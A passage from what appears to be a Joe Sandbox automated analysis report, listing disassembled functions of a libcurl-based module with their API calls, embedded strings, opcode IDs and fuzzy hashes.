                                                                                                                            • Instruction ID: 3cdfb9cf8c5b9df081703b9c2b6757d82918591f0d8d06973f1655f8902bb730
                                                                                                                            • Opcode Fuzzy Hash: fabef46edf3d5ddf9ffdfcb8dbc91b4d58f699b7bd92a86de09bc508f7fc962e
                                                                                                                            • Instruction Fuzzy Hash: 51417B75705301ABEF105E78AC44BAABB7EEF42216F1041FAEC45D7302EA76D50B86A0
                                                                                                                            Function 6B71D7CA Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B71D46B: CreateFileW.KERNEL32(00000000,00000000,?,6B71D873,?,?,00000000,?,6B71D873,00000000,0000000C), ref: 6B71D488
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B71D8DE
                                                                                                                            • __dosmaperr.LIBCMT ref: 6B71D8E5
                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 6B71D8F1
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B71D8FB
                                                                                                                            • __dosmaperr.LIBCMT ref: 6B71D904
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6B71D924
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6B71DA71
                                                                                                                            • GetLastError.KERNEL32 ref: 6B71DAA3
                                                                                                                            • __dosmaperr.LIBCMT ref: 6B71DAAA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                            • String ID: H
                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                            • Opcode ID: 9054532257f645352201d3244592876df4c68bf5ab8d49cdf312eb2ceb4418c3
                                                                                                                            • Instruction ID: e64a4bbb05c511aba57e95086107a43e2067e70b1e50d35fbbb5aa4c696e1284
                                                                                                                            • Opcode Fuzzy Hash: 9054532257f645352201d3244592876df4c68bf5ab8d49cdf312eb2ceb4418c3
                                                                                                                            • Instruction Fuzzy Hash: DDA10332A481549FCF199F78C95579E3BB0AB0A324F1901AAF825AF391D738D902CB65
                                                                                                                            Function 6B6CDBC0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 186COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000018,%04d%02d%02d %02d:%02d:%02d GMT,?,?,?,?,?,?), ref: 6B6CDC9D
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000080,Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT,?,?,?,?,?,?), ref: 6B6CDD74
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            Strings
                                                                                                                            • %04d%02d%02d %02d:%02d:%02d GMT, xrefs: 6B6CDC95
                                                                                                                            • %04d%02d%02d%02d%02d%02d, xrefs: 6B6CDC58
                                                                                                                            • Given file does not exist, xrefs: 6B6CDC0D
                                                                                                                            • unsupported MDTM reply format, xrefs: 6B6CDBFA
                                                                                                                            • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 6B6CDD69
                                                                                                                            • The requested document is not old enough, xrefs: 6B6CDE3D
                                                                                                                            • Skipping time comparison, xrefs: 6B6CDE44
                                                                                                                            • The requested document is not new enough, xrefs: 6B6CDDF0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_msnprintf$curl_mvsnprintf
                                                                                                                            • String ID: %04d%02d%02d %02d:%02d:%02d GMT$%04d%02d%02d%02d%02d%02d$Given file does not exist$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$unsupported MDTM reply format
                                                                                                                            • API String ID: 405648482-226030088
                                                                                                                            • Opcode ID: 22b839fdc5e172a77159fc2357bd0b84df3d44dc5f576edaad93ca6e5be10000
                                                                                                                            • Instruction ID: 197667be88505e7d98f464c3d17ead9ae89c6b987209ede2662b76dbc58d2ceb
                                                                                                                            • Opcode Fuzzy Hash: 22b839fdc5e172a77159fc2357bd0b84df3d44dc5f576edaad93ca6e5be10000
                                                                                                                            • Instruction Fuzzy Hash: A461B3B1D81208ABDB20CE74DD81FDBB7B9EF59304F0044E9E55DA7101EB39AA44CB66
                                                                                                                            Function 6B6ED9D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6EDA0F
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6EDA4D
                                                                                                                            • curl_msnprintf.LIBCURL(6B6D1696,00000009,%2I64d:%02I64d:%02I64d,6B6D1696,?,00000000,?,?,6B6D1696,?,6B6D1696,0000003C,00000000,00000000,?,00000E10), ref: 6B6EDAA5
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6EDABD
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6EDAF2
                                                                                                                            • curl_msnprintf.LIBCURL(6B6D1696,00000009,%3I64dd %02I64dh,00000000,6B6D1696,00000000,?,?,6B6D1696,00000E10,00000000,00000000,?,00015180,00000000,?), ref: 6B6EDB07
                                                                                                                            • curl_msnprintf.LIBCURL(6B6D1696,00000009,%7I64dd,00000000,?,?,6B6D1696,00015180,00000000,?,6B6D1696,00000E10,00000000,?,6B6D1696,?), ref: 6B6EDB22
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf
                                                                                                                            • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
                                                                                                                            • API String ID: 2752550610-564197712
                                                                                                                            • Opcode ID: 0f65646651f7a0fc50060a6456349b8454f9c428810601e43edc711e83d06594
                                                                                                                            • Instruction ID: 0f6af298b92b236e4dd58dee2108c11e613e4a8f3652fa1d2189de4d7d3c34f1
                                                                                                                            • Opcode Fuzzy Hash: 0f65646651f7a0fc50060a6456349b8454f9c428810601e43edc711e83d06594
                                                                                                                            • Instruction Fuzzy Hash: 0C4127B3B452587AEB205D7D8C41FAEB7ADDBC4654F010175FE08EB181E6759E1183A0
                                                                                                                            Function 6B6C1A20 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 322COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c%c%c,?,?,?,?), ref: 6B6C1B38
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c%c=,?,?,?), ref: 6B6C1B5D
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c==,?,?), ref: 6B6C1B79
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_msnprintf
                                                                                                                            • String ID: %c%c%c%c$%c%c%c=$%c%c==$%ld%s
                                                                                                                            • API String ID: 1809024409-1523555428
                                                                                                                            • Opcode ID: 4e89af8ca3a0744049a8e06133cd5a8fc1e5283f227c1a151c68a508b1547f8e
                                                                                                                            • Instruction ID: 756191bbaedad514f8018278870dc97671c3e05179a42d73150d25e069e8ed33
                                                                                                                            • Opcode Fuzzy Hash: 4e89af8ca3a0744049a8e06133cd5a8fc1e5283f227c1a151c68a508b1547f8e
                                                                                                                            • Instruction Fuzzy Hash: C6B1F7B18046659FDB11CF68C841BEBBBF8EF06305F0441D9E89997242E738EA55CFA1
                                                                                                                            Function 6B6FA0E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,00000100), ref: 6B6FA0E7
                                                                                                                            • _strncpy.LIBCMT ref: 6B6FA12D
                                                                                                                            • _strrchr.LIBCMT ref: 6B6FA16D
                                                                                                                            • _strrchr.LIBCMT ref: 6B6FA188
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 6B6FA1B3
                                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 6B6FA1C1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$_strrchr$_strncpy
                                                                                                                            • String ID: Unknown error %d (%#x)
                                                                                                                            • API String ID: 1320708361-2414550090
                                                                                                                            • Opcode ID: 4bc7eb8cb7fa0174de4a4c8cef1df29752d394e603d3ce6d8c3afe2fd8b8b869
                                                                                                                            • Instruction ID: 11b8faec238d637ce63f0664058769893bab3c1bf6ada8b2aeda52ad49f0f00f
                                                                                                                            • Opcode Fuzzy Hash: 4bc7eb8cb7fa0174de4a4c8cef1df29752d394e603d3ce6d8c3afe2fd8b8b869
                                                                                                                            • Instruction Fuzzy Hash: D82124F0A08218ABDB019E759D46B6F7BBEDF56259F0500A9FC0497341FB3CD90282B2
                                                                                                                            Function 6B71E10C Relevance: 13.8, APIs: 9, Instructions: 301COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 94790f7b36c75f92f305361892dd1a9517c1e099814a6b8a2d9c92fe5c616704
                                                                                                                            • Instruction ID: 9aebfa192b8b12b5170a03353edde7138b648a09940d312f7f953abd4a19ffda
                                                                                                                            • Opcode Fuzzy Hash: 94790f7b36c75f92f305361892dd1a9517c1e099814a6b8a2d9c92fe5c616704
                                                                                                                            • Instruction Fuzzy Hash: 7FC1D774E1C2099FDB05CFA9CA95BAD7BB5AF4A304F0840A9F814AB781C778D941CB71
                                                                                                                            Function 6B6CA760 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 367COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • Content-Length: %I64d, xrefs: 6B6CA87D
                                                                                                                            • failed to resume file:// transfer, xrefs: 6B6CAC25
                                                                                                                            • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s, xrefs: 6B6CA935
                                                                                                                            • Can't get the size of file., xrefs: 6B6CA9CE
                                                                                                                            • Accept-ranges: bytes, xrefs: 6B6CA8AC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: Accept-ranges: bytes$Can't get the size of file.$Content-Length: %I64d$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$failed to resume file:// transfer
                                                                                                                            • API String ID: 601868998-1509146019
                                                                                                                            • Opcode ID: 98f7d449c6bfa1ca15b7a9835ae2746441344d3c1c49412aee0be5b1c7b32dfa
                                                                                                                            • Instruction ID: 634b1118eafc5989245f7bd42f4f1f3293f54e57dd838adf67f371553bba65de
                                                                                                                            • Opcode Fuzzy Hash: 98f7d449c6bfa1ca15b7a9835ae2746441344d3c1c49412aee0be5b1c7b32dfa
                                                                                                                            • Instruction Fuzzy Hash: 3CD1B5B1E052189BEB208B78DD41BEEB7B6EF45304F0040E9E94DA7251EB795E84CF52
                                                                                                                            Function 6B6CD3D0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 250COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Request has same path as previous transfer, xrefs: 6B6CD68E
                                                                                                                            • Uploading to a URL without a file name!, xrefs: 6B6CD5EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr_strncpy$_strrchr
                                                                                                                            • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!
                                                                                                                            • API String ID: 2378022753-131330169
                                                                                                                            • Opcode ID: cdf88c9ce463338a7db816b0a20c62d7f4484c21747a840acdb8a6d79eb0e5ea
                                                                                                                            • Instruction ID: 3a3ba580c8aac3caf7216a29d0aa8fd6b6fcbac099a50cd1788aadeaa10312bc
                                                                                                                            • Opcode Fuzzy Hash: cdf88c9ce463338a7db816b0a20c62d7f4484c21747a840acdb8a6d79eb0e5ea
                                                                                                                            • Instruction Fuzzy Hash: 319109B0EC4206ABDB049F34C845B9B7BB5EF05349F4041B9E91C9B241EB3AE955CB92
                                                                                                                            Function 6B6C6600 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 223COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_mfprintf.LIBCURL(?,%s,00000000), ref: 6B6C679A
                                                                                                                            Strings
                                                                                                                            • # Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 6B6C6707
                                                                                                                            • %s.%s.tmp, xrefs: 6B6C66C1
                                                                                                                            • %s, xrefs: 6B6C6792
                                                                                                                            • ## Fatal libcurl error, xrefs: 6B6C67F5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_mfprintf
                                                                                                                            • String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                                                                                                            • API String ID: 8901498-4087121635
                                                                                                                            • Opcode ID: 8c9f91b2b9dd09e41646499e2bd255609ed6bab9927efc7c56afc9f99fa9414c
                                                                                                                            • Instruction ID: dfa56364d59a99fe1429faf0f93a7fbf28a3ed93a85161bf7c41ecad162bf21c
                                                                                                                            • Opcode Fuzzy Hash: 8c9f91b2b9dd09e41646499e2bd255609ed6bab9927efc7c56afc9f99fa9414c
                                                                                                                            • Instruction Fuzzy Hash: EB61C5F1E042499BDF009FB899967FF7B74DF05208F0400B5ED15A7201DB6E9A1587BA
                                                                                                                            Function 6B6CD8E0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 180COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strstr
                                                                                                                            • String ID: $ bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$RETR response: %03d
                                                                                                                            • API String ID: 2882301372-2096918210
                                                                                                                            • Opcode ID: 8290ebe91560c22c55ef0b3e341de28725afcb1cc9b361f31e2de5889394c699
                                                                                                                            • Instruction ID: 96789ce383bd04674a701ef3648d321ea016b8b75076bff557cbf469d3f5118d
                                                                                                                            • Opcode Fuzzy Hash: 8290ebe91560c22c55ef0b3e341de28725afcb1cc9b361f31e2de5889394c699
                                                                                                                            • Instruction Fuzzy Hash: 9E5116F5DC82449BDB10CFB8D84179B7BA5EB45325F0042EAED6C8B291D338D640C792
                                                                                                                            Function 6B6CEA30 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 155COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_mvsnprintf
                                                                                                                            • String ID: %s%s%s$Couldn't set desired mode$Got a %03d response code instead of the assumed 200$LIST$NLST
                                                                                                                            • API String ID: 3418963191-1262176364
                                                                                                                            • Opcode ID: 68ba51bbfc55316b71ac0a96cd6f3283158b4c639445504842a15477877eafa0
                                                                                                                            • Instruction ID: 303aaffe092a083ed2fad88b94385757016feeefe0c3b3637fb3178f410f00bc
                                                                                                                            • Opcode Fuzzy Hash: 68ba51bbfc55316b71ac0a96cd6f3283158b4c639445504842a15477877eafa0
                                                                                                                            • Instruction Fuzzy Hash: 064129F2B001146BEB105A78ED83BAB77A9DB44669F0044B6FD0DDB201E729E90487E1
                                                                                                                            Function 6B6DD930 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6DD9E9
                                                                                                                            • curl_maprintf.LIBCURL(%.*s,00000000,?,?,?,?,?,?,?,?,?,00000000,?,CONNECT,00000000,00000001), ref: 6B6DD9FE
                                                                                                                              • Part of subcall function 6B6E48E0: curl_mvaprintf.LIBCURL(?,?,?,6B6C66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B6E48EA
                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Digest %s,Proxy-,?), ref: 6B6DDA61
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_maprintf$___from_strstr_to_strchrcurl_mvaprintf
                                                                                                                            • String ID: %.*s$%sAuthorization: Digest %s$Digest$Proxy-
                                                                                                                            • API String ID: 2694567262-3976116069
                                                                                                                            • Opcode ID: fb7b42ccafa9272e29a5c5e8ef71a97789e160fd7d39aba23cf0a8386375ec61
                                                                                                                            • Instruction ID: cd681da111291c5cca8b91e5663ef7c99c9a4c8b143f86e1a0535c4608983f6c
                                                                                                                            • Opcode Fuzzy Hash: fb7b42ccafa9272e29a5c5e8ef71a97789e160fd7d39aba23cf0a8386375ec61
                                                                                                                            • Instruction Fuzzy Hash: DE4175B1A04249EFDB00DFA8D881BAD7BE5EF45345F0480BAF908DB351E735DA548BA1
                                                                                                                            Function 6B6E28F0 Relevance: 12.2, APIs: 8, Instructions: 199COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_mime_data.LIBCURL(?,?,?), ref: 6B6E2917
                                                                                                                            • curl_mime_filedata.LIBCURL(?,?), ref: 6B6E292A
                                                                                                                            • curl_mime_data_cb.LIBCURL(?,?,?,?,?,?,?), ref: 6B6E2955
                                                                                                                            • curl_mime_init.LIBCURL ref: 6B6E2963
                                                                                                                            • curl_mime_subparts.LIBCURL(?,00000000), ref: 6B6E2976
                                                                                                                            • curl_mime_addpart.LIBCURL(00000000), ref: 6B6E299D
                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?), ref: 6B6E2A1B
                                                                                                                            • curl_slist_free_all.LIBCURL(?,?), ref: 6B6E2A44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_slist_free_all$curl_mime_addpartcurl_mime_datacurl_mime_data_cbcurl_mime_filedatacurl_mime_initcurl_mime_subparts
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3177825088-0
                                                                                                                            • Opcode ID: 364637ce9c6135f1bbe082f9c174ab8bbb885e5a07112bfcc50d1ad14a7a9042
                                                                                                                            • Instruction ID: cc499bcc60937daa1f63f82483fa7fda9518ea249878dd7ce8d1e37952132f69
                                                                                                                            • Opcode Fuzzy Hash: 364637ce9c6135f1bbe082f9c174ab8bbb885e5a07112bfcc50d1ad14a7a9042
                                                                                                                            • Instruction Fuzzy Hash: CA5137F2A06116ABDF109F29E88155B7765FF04315B0401B8ED099B705E73AE832DBF1
                                                                                                                            Function 6B6D0900 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 318COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
